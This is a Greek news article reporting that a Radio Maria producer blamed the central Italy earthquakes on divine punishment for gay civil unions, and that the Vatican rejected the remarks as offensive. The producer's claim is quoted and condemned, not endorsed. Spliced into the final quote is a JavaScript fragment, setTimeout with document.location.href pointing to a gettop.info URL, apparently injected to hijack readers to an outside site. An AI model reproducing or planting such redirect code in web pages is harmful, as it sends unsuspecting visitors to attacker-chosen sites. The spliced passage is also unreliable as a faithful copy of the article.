Ιταλία: Οι σεισμοί, η τιμωρία του Θεού για το σύμφωνο συμβίωσης των γκέι

0
9
Pope Francis prays in Amatrice, Italy, October 4, 2016. REUTERS/Greg Burke/Holy See Press Office/Handout via Reuters ATTENTION EDITORS - THIS IMAGE WAS PROVIDED BY A THIRD PARTY. EDITORIAL USE ONLY. NO RESALES. NO ARCHIVE. - RTSQNHF

 

Αποστάσεις παίρνει το Βατικανό από τις ακραίες τοποθετήσεις παραγωγού στον ραδιοφωνικό σταθμό της ιταλικής εκκλησίας «Radio Maria».
Ο παραγωγός υποστήριξε πως οι ισχυροί σεισμοί που έπληξαν την κεντρική Ιταλία την περασμένη εβδομάδα σημειώθηκαν ως… τιμωρία του Θεού για τα σύμφωνα συμβίωσης.

«Αυτές οι καταστροφές είναι συνέπεια του προπατορικού αμαρτήματος, μπορούν να ερμηνευθούν ως θεϊκή τιμωρία. Υπάρχει η εντύπωση ότι οι προσβολές που σημειώνονται κατά του νόμου του Θεού… σκεφτείτε την αξιοπρέπεια της οικογένειας, του γάμου, την ίδια την αξιοπρέπεια της σεξουαλικής ένωσης… σκέφτεται κανείς ότι βρισκόμαστε μπροστά… ας το πούμε θεϊκή τιμωρία, αλλά εννοείται σαν κάλεσμα για να ξαναβρούμε τις αξίες του νόμου της φύσης», είπε, μεταξύ άλλων ο ραδιοφωνικός παραγωγός του «Radio Maria», ο οποίος πολύ απλά εκτιμά ότι ο Θεός τιμώρησε τους ομοφυλόφιλους, ταρακουνώντας τη γη με συνεχείς σεισμικές δονήσεις.

Για «προσβλητικές και σκανδαλώδεις δηλώσεις» έκανε λόγο το Βατικανό, με τον μονσινιόρ Άντζελο Μπετσού, από τους πιο στενούς συνεργάτες του Πάπα Φραγκίσκου, να εξηγεί πως οι επίμαχες τοποθετήσεις δεν αντιστοιχούν στη θεολογία της ιταλικής εκκλησίας, καθώς είναι αντίθετες στο όραμα του Θεού όπως αυτό προσφέρθηκε στους πιστούς μέσω του Χριστού.

«Ας μας συγχωρήσουν οι σεισμόπληκτοι», πρόσθεσε ο Μπετσού…. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here